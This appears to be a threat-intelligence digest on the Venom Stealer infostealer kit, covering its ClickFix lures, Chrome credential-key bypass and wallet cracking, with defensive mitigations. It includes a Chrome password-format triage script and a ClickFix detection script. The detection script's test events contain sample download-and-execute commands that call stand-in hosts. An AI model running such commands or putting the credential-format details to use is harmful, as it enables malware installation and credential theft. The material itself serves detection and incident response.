
Venom Stealer infostealer kit introduces continuous credential harvesting via malware-as-a-service model

2 unique sources, 2 articles

Summary


Venom Stealer is a newly identified infostealer kit sold as a malware-as-a-service (MaaS) subscription at $250 per month or $1,800 for lifetime access, giving subscribers a continuously maintained credential-harvesting and wallet-cracking operation rather than a one-off payload. It targets Windows and macOS. Initial access uses ClickFix-style social engineering built into the operator panel: fake Cloudflare CAPTCHA pages, OS update prompts, SSL certificate errors and font installation pages instruct the victim to paste a command into the Windows Run dialog or the macOS Terminal, so the resulting process tree begins with a user-launched shell rather than a document, macro or exploit and is less likely to be flagged. Once running, the stealer collects saved passwords, session cookies, browsing history, autofill data, cryptocurrency wallet vaults, browser extension data and a system fingerprint from Chromium-based and Firefox browsers. Two features separate it from steal-and-exit tools: a silent background session listener that reports newly captured credentials and wallet activity to the command-and-control infrastructure twice a day, and continuous monitoring of Chrome's login database so that credentials saved after the initial compromise are also captured. Exfiltrated wallet vaults go to a server-side GPU cracking engine, and funds recovered from cracked vaults, including tokens and DeFi positions, are swept across multiple blockchain networks automatically. Because the implant keeps reporting, rotating passwords after a detected compromise does not lock the operator out unless the host itself is remediated, which is what undermines password rotation and incident response.

Timeline

  1. 31.03.2026 17:51 2 articles · 1d ago

    Venom Stealer introduces continuous credential harvesting with background session listener in March 2026

    The Venom Stealer infostealer kit was updated in March 2026 with a silent background session listener that reports newly captured credentials and cryptocurrency wallet activity to its command-and-control (C2) infrastructure twice daily. The update turns the tool from a steal-and-exit infostealer into a persistent surveillance and harvesting platform: credentials rotated after an initial compromise are simply collected again, which undermines password-rotation policies and compresses incident response timelines. Further details published on April 1, 2026 indicate that Venom Stealer now integrates ClickFix social engineering directly into its operator panel, automating the chain from lure to data theft with templated pages such as a fake Cloudflare CAPTCHA, an OS update prompt, an SSL certificate error, or a font installation page. Victims are coaxed into pasting a command into the Windows Run dialog or the macOS Terminal, so the infection starts from a user-launched shell and is less likely to be flagged than a document- or exploit-borne payload. The malware fingerprints the host and collects browser extension data to profile infected systems. Post-infection, it continuously monitors Chrome's login database so that newly saved credentials are captured in real time, and exfiltrated cryptocurrency wallet vaults are cracked server-side on GPU infrastructure, with recovered funds automatically transferred across multiple blockchain networks, including tokens and DeFi positions.


Information Snippets

  • Venom Stealer is distributed as a malware-as-a-service (MaaS) subscription priced at $250 per month or $1,800 for lifetime access, with updates provided under license.

    First reported: 31.03.2026 17:51
    2 sources, 2 articles
  • The infostealer reportedly defeats both of Chrome's on-disk credential protection formats on Windows: v10, whose AES-GCM key sits DPAPI-wrapped in the profile's Local State file and can be unwrapped by any process running as the logged-on user, and v20 (App-Bound Encryption, Chrome 127 and later), whose key is additionally wrapped so that only Chrome's SYSTEM-level elevation service will unwrap it, and only for a caller it validates as Chrome. The source states the keys are extracted via a silent privilege escalation that triggers no UAC prompt and leaves no forensic artifacts. Treat the "no artifacts" part as the vendor's claim rather than established fact: reaching SYSTEM normally produces process-creation, service or token telemetry an EDR can record. The v20 bypass is the part that matters, since v10 entries were already within reach of any user-context stealer.

    First reported: 31.03.2026 17:51
    1 source, 1 article
  • Venom Stealer targets Chromium and Firefox browsers, extracting saved passwords, session cookies, browsing history, autofill data, and cryptocurrency wallet vaults from all browser profiles.

    First reported: 31.03.2026 17:51
    1 source, 1 article
  • A continuous background session listener was added in March 2026. It reports newly captured credentials and cryptocurrency wallet activity to the command-and-control infrastructure twice daily, so passwords changed after an initial compromise are harvested again; this is what defeats password rotation and incident-response timelines unless the implant itself is removed.

    First reported: 31.03.2026 17:51
    2 sources, 2 articles
  • The infostealer includes automated cracking support for cryptocurrency wallets including MetaMask, Phantom, Solflare, Trust Wallet, Atomic, Exodus, Electrum, Bitcoin Core, Monero, and Tonkeeper. Funds recovered from cracked vaults are automatically swept across nine chains, including ERC-20 and SPL tokens and DeFi positions held on them. Because the encrypted vault files are cracked offline on the operator's infrastructure, changing the wallet password after exfiltration does not protect the keys already contained in the stolen copy; only moving the funds to a freshly generated wallet does.

    First reported: 31.03.2026 17:51
    1 source, 1 article
  • Venom Stealer integrates ClickFix social engineering directly into its operator panel, automating the attack chain from infection to data theft via fake webpages such as Cloudflare CAPTCHA, OS update prompts, SSL certificate errors, or font installation pages.

    First reported: 01.04.2026 16:30
    1 source, 1 article
  • Victims are tricked into running the command themselves via the Windows Run dialog or the macOS Terminal, so the infection appears user-initiated: the process tree starts under explorer.exe or Terminal rather than a document, macro or exploit, which is how the technique slips past detection keyed on the usual delivery vectors.

    First reported: 01.04.2026 16:30
    1 source, 1 article
  • The malware performs system fingerprinting and collects browser extension data to create detailed profiles of infected systems.

    First reported: 01.04.2026 16:30
    1 source, 1 article
  • After infection, Venom Stealer continuously monitors Chrome's login database to capture newly saved credentials in real time, extending credential harvesting beyond initial exfiltration.

    First reported: 01.04.2026 16:30
    1 source, 1 article
  • Cryptocurrency wallet data is sent to a server-side cracking engine running on GPU infrastructure, with cracked funds automatically transferred across multiple blockchain networks including tokens and DeFi positions.

    First reported: 01.04.2026 16:30
    1 source, 1 article
  • Venom Stealer includes automated ClickFix delivery templates for both Windows and macOS platforms.

    First reported: 01.04.2026 16:30
    1 source, 1 article
  • Attack chains can be disrupted by restricting PowerShell execution, disabling the Run dialog for standard users, training employees to recognize ClickFix-style social engineering, and monitoring outbound network traffic for the exfiltration burst that immediately follows execution. Two practical caveats: the PowerShell execution policy is not a security boundary and is bypassed by a single command-line flag, so "restricting" here means application control (AppLocker or WDAC) or Constrained Language Mode; and hiding the Run dialog (the NoRun Explorer policy) only removes the Win+R step used by the lure, not cmd.exe or Windows Terminal, so it should be paired with command-line logging rather than relied on alone.

    First reported: 01.04.2026 16:30
    1 source, 1 article
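
The two snippets above on Chrome's v10/v20 protection and on continuous monitoring of Chrome's login database both come down to the same file: the "Login Data" SQLite database in the profile directory. The following triage helper is an added example written for this page, not code from Venom Stealer or from any vendor report. Given the profile's "Local State" JSON and a copy of the `logins` table, it reports which protection layer each saved password is under, so an incident responder can tell how much of a compromised profile was exposed to a plain user-context stealer (v10) versus the App-Bound path (v20) the page says this kit bypasses. The `v10`/`v20` value prefixes, the `DPAPI`/`APPB` key prefixes and the 12-byte nonce plus 16-byte GCM tag layout are Chrome's real on-disk format; the database rows, the Local State blob and the origins are constructed, and nothing here decrypts anything.

```python
"""Triage which protection layer each saved Chrome password is under.

Added example for this page. The "v10"/"v20" value prefixes, the "DPAPI"/"APPB"
key prefixes and the nonce/tag layout are Chrome's real on-disk format; all
sample data below is constructed. Nothing here decrypts anything.
"""
import base64
import json
import os
import sqlite3
from collections import Counter

NONCE_LEN = 12  # AES-256-GCM nonce that follows the 3-byte version prefix
TAG_LEN = 16    # GCM authentication tag appended to the ciphertext


def key_protection(local_state_json: str) -> dict:
    """Report which wrapped keys Local State carries.

    os_crypt.encrypted_key is the v10 key, DPAPI-wrapped in the user's context
    (decoded blob starts with b"DPAPI"). os_crypt.app_bound_encrypted_key is
    the v20 key, wrapped so only Chrome's SYSTEM-level elevation service will
    unwrap it (decoded blob starts with b"APPB").
    """
    os_crypt = json.loads(local_state_json).get("os_crypt", {})
    result = {"dpapi_key": False, "app_bound_key": False}
    key = os_crypt.get("encrypted_key")
    if key and base64.b64decode(key).startswith(b"DPAPI"):
        result["dpapi_key"] = True
    key = os_crypt.get("app_bound_encrypted_key")
    if key and base64.b64decode(key).startswith(b"APPB"):
        result["app_bound_key"] = True
    return result


def classify_blob(password_value: bytes) -> str:
    """Return 'v10', 'v20', 'malformed' (truncated versioned blob) or 'other'."""
    prefix = password_value[:3]
    if prefix not in (b"v10", b"v20"):
        return "other"
    # Even an empty password encrypts to nonce + tag, so anything shorter
    # than that after the prefix cannot be a complete blob.
    if len(password_value) - 3 < NONCE_LEN + TAG_LEN:
        return "malformed"
    return prefix.decode("ascii")


def triage_logins(conn: sqlite3.Connection) -> dict:
    """Count blob formats and list origins whose password is not app-bound."""
    counts = Counter()
    not_app_bound = []
    for origin, blob in conn.execute(
        "SELECT origin_url, password_value FROM logins ORDER BY rowid"
    ):
        kind = classify_blob(bytes(blob))
        counts[kind] += 1
        if kind != "v20":
            not_app_bound.append(origin)
    return {"counts": dict(counts), "not_app_bound": not_app_bound}


def build_sample_db() -> sqlite3.Connection:
    """Constructed stand-in for a Login Data copy (real tables have more columns)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE logins (origin_url TEXT, username_value TEXT, password_value BLOB)"
    )
    fake_ct = b"\x00" * 9  # stands in for 9 bytes of ciphertext
    rows = [
        ("https://mail.example", "alice",
         b"v10" + os.urandom(NONCE_LEN) + fake_ct + os.urandom(TAG_LEN)),
        ("https://bank.example", "alice",
         b"v20" + os.urandom(NONCE_LEN) + fake_ct + os.urandom(TAG_LEN)),
        ("https://old.example", "alice", b"v10" + b"\x00" * 5),  # truncated blob
    ]
    conn.executemany("INSERT INTO logins VALUES (?, ?, ?)", rows)
    return conn


# Constructed Local State with both wrapped keys present.
SAMPLE_LOCAL_STATE = json.dumps({"os_crypt": {
    "encrypted_key": base64.b64encode(b"DPAPI" + b"\x01\x00\x00\x00" + b"\x00" * 28).decode(),
    "app_bound_encrypted_key": base64.b64encode(b"APPB" + b"\x01\x00\x00\x00" + b"\x00" * 28).decode(),
}})

if __name__ == "__main__":
    print(key_protection(SAMPLE_LOCAL_STATE))
    print(triage_logins(build_sample_db()))
```

Run it against a copy of `Login Data` taken while Chrome is closed or from a volume shadow copy, since the live file is locked. Rows still classified `v10` were reachable by any process running as the user, which is the baseline every Windows infostealer has had for years; the `v20` rows are where the page's claim of a silent SYSTEM-level key extraction actually adds capability. The same file is also the one the page says the stealer polls for newly saved credentials, so file-access auditing on its path for any process other than the browser is a cheap complementary detection.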

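The mitigation snippet above recommends command-line logging and network monitoring, and the ClickFix snippets describe exactly what that logging should catch: an interpreter spawned straight from the Run dialog or a Terminal with a download-and-execute one-liner. The scorer below is an added example written for this page, not code from Venom Stealer, its vendor or any EDR product. It takes process-creation events shaped like Sysmon Event ID 1 (Windows Security event 4688 carries the same fields), decodes any `-EncodedCommand` payload, and scores the raw and decoded command lines against ClickFix indicators. The four sample events, the `.example` hostnames, the indicator weights and the threshold are all constructed assumptions to be tuned to a real estate.

```python
"""Score process-creation events for ClickFix-style execution.

Added example for this page (not vendor or malware code). Events are dicts
with Sysmon Event ID 1 fields; the samples, weights and threshold are assumed.
"""
import base64
import re

# Where a user lands after following a Win+R or "open Terminal" instruction.
LAUNCHERS = {"explorer.exe", "terminal", "iterm2"}
# Interpreters and downloaders a ClickFix lure asks the victim to run.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "curl.exe", "bash", "zsh", "sh", "osascript"}

# (regex, description, weight); matched case-insensitively.
INDICATORS = [
    (r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\b", "encoded command", 3),
    (r"-w(?:indowstyle)?\s+h(?:idden)?\b", "hidden window", 2),
    (r"\b(?:iex|invoke-expression)\b", "in-memory evaluation", 3),
    (r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b", "download cradle", 2),
    (r"\bmshta(?:\.exe)?\s+https?://", "remote HTA", 3),
    (r"\bcurl\b.*\|\s*(?:ba|z)?sh\b", "curl piped to a shell", 3),
    (r"\bbase64\s+(?:-d|--decode)\b.*\|", "base64 decode piped onward", 2),
    (r"verif(?:y|ication)|captcha|not a robot|\u2705", "CAPTCHA/verification text", 2),
]
ENCODED_ARG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> str:
    """Recover the script behind -EncodedCommand (base64 of UTF-16LE)."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""


def score_event(ev: dict) -> dict:
    parent, image = basename(ev.get("ParentImage", "")), basename(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "")
    score, reasons = 0, []
    if parent in LAUNCHERS and image in INTERPRETERS:
        score += 2
        reasons.append(f"{image} launched directly from {parent}")
    decoded = decode_encoded_command(cmd)
    # Mask long base64 runs so indicators are not matched inside the payload
    # by chance; the decoded form is scanned on its own below.
    raw = re.sub(r"[A-Za-z0-9+/=]{40,}", "<base64>", cmd)
    for text, tag in ((raw, ""), (decoded, " (decoded)")):
        for pattern, desc, weight in INDICATORS:
            if text and re.search(pattern, text, re.I):
                score += weight
                reasons.append(desc + tag)
    return {"score": score, "reasons": reasons, "decoded": decoded}


def detect(events: list, threshold: int = 5) -> list:
    """Return events at or above the threshold, annotated with their verdict."""
    return [{**ev, **v} for ev in events if (v := score_event(ev))["score"] >= threshold]


# Constructed events; the encoded payload is built here from a plain string.
_LURE = "iex (irm https://cf-verify.example/x.ps1) # \u2705 I am not a robot"
_B64 = base64.b64encode(_LURE.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell -w hidden -enc {_B64}"},
    {"ParentImage": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
     "Image": "/bin/bash",
     "CommandLine": 'bash -c "curl -fsSL https://font-fix.example/i | bash"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -NoProfile -File C:\Scripts\inventory.ps1"},
    {"ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoLogo"},
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit["score"], hit["reasons"])
```

The parent-process check carries little weight on its own because administrators also launch PowerShell from Win+R; the combination with a hidden window, an encoded payload, a download cradle and the lure's own "not a robot" text is what pushes the first event far over the threshold, while the macOS `curl | bash` event clears it only because the pipe-to-shell pattern is strong by itself. On Windows, the Run dialog also records what was typed under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`, which gives a responder a cheap confirmation that a flagged command came from a paste rather than from a scheduled task or login script.
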
Similar Happenings

Torg Grabber infostealer expands to 850 browser extensions including 728 crypto wallets

A new info-stealing malware family named Torg Grabber has been identified targeting 850 browser extensions, with over 700 focused on cryptocurrency wallets. Initial access is achieved via the ClickFix technique, involving clipboard hijacking and users tricked into executing malicious PowerShell commands. The malware evolves rapidly, with 334 unique samples compiled in three months and new command-and-control (C2) servers registered weekly. Torg Grabber employs advanced anti-analysis, multi-layered obfuscation, direct syscalls, and reflective loading to evade detection. It exfiltrates data over HTTPS via Cloudflare, supports chunked uploads, and includes mechanisms to bypass browser cookie protection. The malware targets credentials, cookies, autofill data, and files from 25 Chromium-based browsers and 8 Firefox variants, alongside a wide range of applications including password managers, 2FA tools, messaging platforms, VPNs, and desktop crypto wallets.

ErrTraffic Service Enables Automated ClickFix Attacks via Fake Browser Glitches

A new cybercrime tool called ErrTraffic automates ClickFix attacks by generating fake browser glitches on compromised websites to trick users into downloading malware or following malicious instructions. The service promises high conversion rates and delivers architecture-specific payloads. ClickFix attacks have gained popularity among cybercriminals and state-sponsored actors for bypassing security controls. ErrTraffic is sold for a one-time purchase of $800 and offers a user-friendly panel for campaign management. It modifies the DOM of compromised websites to display visual glitches, prompting victims to execute malicious commands. Payloads include Lumma and Vidar info-stealers on Windows, Cerberus trojan on Android, AMOS stealer on macOS, and unspecified Linux backdoors.

Increased Use of ClickFix Attacks by Threat Actors

ClickFix attacks, where users are tricked into running malicious commands by copying code from a webpage, have become a significant source of security breaches. These attacks are used by various threat actors, including the Interlock ransomware group and state-sponsored APTs. Recent data breaches at Kettering Health, DaVita, City of St. Paul, and Texas Tech University Health Sciences Centers have been linked to ClickFix-style tactics. A new variant of ClickFix attacks has emerged, targeting cryptocurrency users by abusing Pastebin comments to distribute malicious JavaScript. This attack tricks users into executing code that hijacks Bitcoin swap transactions, redirecting funds to attacker-controlled wallets. The campaign relies on social engineering that promises large profits from a supposed Swapzone.io arbitrage exploit, but instead runs malicious code that modifies the swap process directly within the victim's browser. The attacks exploit user behavior and technical gaps in detection to evade security measures and are delivered through SEO poisoning, malvertising, and other non-email vectors, making them harder to detect and prevent. Effective defense against ClickFix attacks requires browser-based detection and blocking to intercept these threats at the earliest opportunity.

COLDRIVER APT Group Uses ClickFix Tactics to Deliver BAITSWITCH and SIMPLEFIX Malware

The COLDRIVER APT group, also known as Star Blizzard, has intensified its operations since May 2025, rapidly developing and refining its malware arsenal. The group has launched a new campaign using ClickFix tactics to deliver three new malware families: NOROBOT, YESROBOT, and MAYBEROBOT. These families are connected via a delivery chain and target individuals and organizations connected to Russia, including NGOs, human rights defenders, and think tanks. The attack chain involves tricking victims into running a malicious DLL via a fake CAPTCHA check, leading to the deployment of the SIMPLEFIX backdoor. The malware exfiltrates specific file types and establishes communication with a command-and-control server. The campaign aligns with COLDRIVER's known victimology, focusing on civil society members connected to Russia. The group has been active since 2019, using spear-phishing and custom tools like SPICA and LOSTKEYS. The latest campaign demonstrates the group's continued use of effective infection vectors despite the tools' limited technical sophistication. NOROBOT and MAYBEROBOT are tracked by Zscaler ThreatLabz under the names BAITSWITCH and SIMPLEFIX, respectively. COLDRIVER has been deploying the new malware set more aggressively than in any previous campaign. It replaces the previous primary malware LOSTKEYS, which has not been observed since its public disclosure in May 2025.

The attack starts with a ClickFix-style phishing lure: a fake CAPTCHA page designed to make the victim believe they must verify they are "not a robot". The malware uses a split-key cryptography scheme, with parts of the decryption key hidden in downloaded files and in the Windows Registry. It fetches a self-extracting Python 3.8 installer, two encrypted Python scripts, and a scheduled task for persistence. The Python scripts are combined to decrypt and launch a minimal Python-based first-stage backdoor that communicates with a hardcoded command-and-control (C2) server. COLDRIVER abandoned YESROBOT after just two weeks because it was cumbersome and easily detected, switching around June 2025 to MAYBEROBOT, a more flexible PowerShell-based backdoor. MAYBEROBOT uses a custom C2 protocol with commands to download and execute files, run commands via cmd.exe, and execute PowerShell blocks. The group has been constantly evolving NOROBOT to evade detection systems, and has used NOROBOT and MAYBEROBOT on targets previously compromised through phishing to pull additional intelligence directly from their devices.

The related PhantomCaptcha campaign targeted Ukrainian regional government administrations and organizations critical to the war relief effort, including the International Committee of the Red Cross, UNICEF, and various NGOs. It began on October 8, 2025, and used a malicious "I am not a robot" CAPTCHA challenge to execute a PowerShell command that installed malware on victims' systems. The malware operated in three stages: a downloader script, a reconnaissance module, and a WebSocket-based RAT. The campaign's front-end infrastructure was active for just one day, while backend servers remained online to manage infected devices. PhantomCaptcha is linked to a wider operation involving malicious Android apps disguised as adult entertainment or cloud storage services.

The latest incidents were reported in May and June 2025 by two organizations, including Reporters Without Borders (RSF). The group is known for impersonating trusted contacts and prompting targets to request missing or malfunctioning attachments. In one case involving RSF in March 2025, a ProtonMail address mimicking a legitimate contact sent a French-language email asking a core member to review a document. No file was attached. When the member requested it, the operators replied in English with a link routed through a compromised website to a ProtonDrive URL; the file itself could not be retrieved because ProtonMail had blocked the associated account. A second victim received a file labeled as a PDF that was actually a ZIP archive disguised with a .pdf extension. The final stage of the attack used a typical Calisto decoy PDF that claimed to be encrypted and instructed the user to open it in ProtonDrive; the link again sent the target through a redirector hosted on a compromised website. The phishing kit analyzed by TDR, located on account.simpleasip[.]org, appeared to be custom built. It targeted ProtonMail accounts using an Adversary-in-the-Middle (AiTM) setup that relays two-factor authentication (2FA). Analysts found injected JavaScript designed to keep the cursor locked to the password field and to interact with an attacker-controlled API for handling CAPTCHA and 2FA prompts. Star Blizzard's infrastructure included servers hosting phishing pages and others serving as API endpoints. Many domains were registered through Namecheap, while some earlier ones were registered via Regway, a pattern that helped analysts track the cluster over time.

Scattered Spider's Browser-Based Attacks and Mitigation Strategies

Scattered Spider, also known as UNC3944, Octo Tempest, or Muddled Libra, has evolved to target browser environments, exploiting vulnerabilities in web applications accessed via Chrome, Edge, Firefox, and other browsers. This group focuses on stealing sensitive data such as credentials, session tokens, and security tokens. Over 80% of security incidents now originate from these web applications, making browser security a critical concern for enterprises. Scattered Spider employs sophisticated techniques like Browser-in-the-Browser overlays, session token theft, and malicious extensions to evade traditional security tools. To counter these threats, CISOs must implement multi-layered browser security strategies, including runtime script protection, session integrity, extension governance, and browser telemetry integration.